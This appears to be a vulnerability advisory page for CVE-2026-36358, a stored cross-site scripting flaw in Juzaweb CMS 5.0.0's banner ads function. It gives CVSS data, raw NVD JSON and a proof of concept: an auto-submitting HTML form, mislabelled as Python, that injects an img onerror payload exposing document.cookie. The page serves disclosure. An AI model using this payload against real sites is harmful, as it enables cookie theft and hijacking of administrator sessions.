Security Vulnerability Report
中文
CVE-2026-36358 CVSS 5.4 MEDIUM

CVE-2026-36358

Published: 2026-05-06 14:16:20
Last Modified: 2026-05-07 15:53:11

Description

Cross Site Scripting vulnerability in Juzaweb CMS v.5.0.0 allows a remote attacker via execute arbitrary code via a crafted script to the Add Banner Ads function

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Juzaweb CMS 5.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-36358 --> <!-- Description: Inject XSS payload via the Add Banner Ads function --> <html> <body> <form action="http://target.com/admin/banner-ads" method="POST"> <input type="hidden" name="title" value="Malicious Ad" /> <input type="hidden" name="type" value="code" /> <!-- Payload containing script to execute alert --> <input type="hidden" name="content" value="<img src=x onerror=alert(document.cookie)>" /> <input type="submit" value="Submit" /> </form> <script> // Auto-submit the form for demonstration document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36358", "sourceIdentifier": "[email protected]", "published": "2026-05-06T14:16:19.583", "lastModified": "2026-05-07T15:53:11.027", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting vulnerability in Juzaweb CMS v.5.0.0 allows a remote attacker via execute arbitrary code via a crafted script to the Add Banner Ads function"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://juzaweb.com", "source": "[email protected]"}, {"url": "https://gist.github.com/yuhuamiao/2c984b2d7f2adb90020818f9308b5862", "source": "[email protected]"}, {"url": "https://juzaweb.com/", "source": "[email protected]"}, {"url": "https://gist.github.com/yuhuamiao/2c984b2d7f2adb90020818f9308b5862", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}